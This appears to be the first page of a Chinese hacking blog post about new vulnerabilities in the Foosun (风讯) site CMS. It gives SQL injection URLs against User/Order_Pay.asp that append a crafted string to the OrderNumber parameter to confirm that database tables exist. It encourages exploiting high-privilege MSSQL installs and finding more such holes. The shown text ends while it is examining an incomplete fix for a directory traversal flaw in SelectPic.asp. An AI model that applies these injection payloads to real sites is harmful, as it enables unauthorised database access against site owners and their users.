2月份风讯整站系统最新漏洞

相信了解SQL注入的朋友应该不用我说就可以看出来了，两条SQL语句两个注入漏洞，我们来确定下漏洞是否真的存在，看我的演示，再页面中出现这部分的是在订单管理部分：首先我们进行一次再现冲值，然后就会产生一个在线冲值的定单，如图



定单号就是200812-997612KF，由于定单号是字符串的所以我们按照字符串注入方式
我们先构造URL并提交：

http://localhost/User/Order_Pay.asp?action=lock_order&OrderNumber=200812-997612KF' and exists (select count(*) from FS_ME_order1) and ''='

' and exists (select count(*) from FS_ME_order1) and ''='

http://localhost/User/Order_Pay.asp?action=lock_order&OrderNumber=200812-997612KF' and exists (select count(*) from FS_ME_order) and ''='

结果返回正确，如图



这也就证明了注入漏洞也是存在的，不过可惜的是这个订单的表段也是在数据库FS_ME.mdb中的利用方面应该和前面的注入漏洞一样，如果朋友们幸运的画能碰到高权限MSSQL数据库的话，应该有很好的效果。另外还有几处类似这两个注入的鸡肋漏洞大家感兴趣的话可以挖掘一下。
在我看系统代码时候，想起了原来的一个可以遍历目录的漏洞于是也从新看了一下原来漏洞的文件，发现管理员在修补这些漏洞的时候做得不是很好，我们来具体的看一下，首先我们看一下代码，我们以User/Commpages/SelectPic.asp为例，代码如下：

以下是引用片段： LimitUpFileFlag = Request("LimitUpFileFlag") CurrPath = Request("CurrPath") If ReplaceExpChar(Replace(CurrPath,"/","")) = False Then Response.Write "<script>alert('您想干什么?\n您的IP已经被记录!\n我们将收集您部分计算机资料');window.location.href='javascript:history.back();';</script>" Response.End

 

 

上一页  [1] [2] [3] 下一页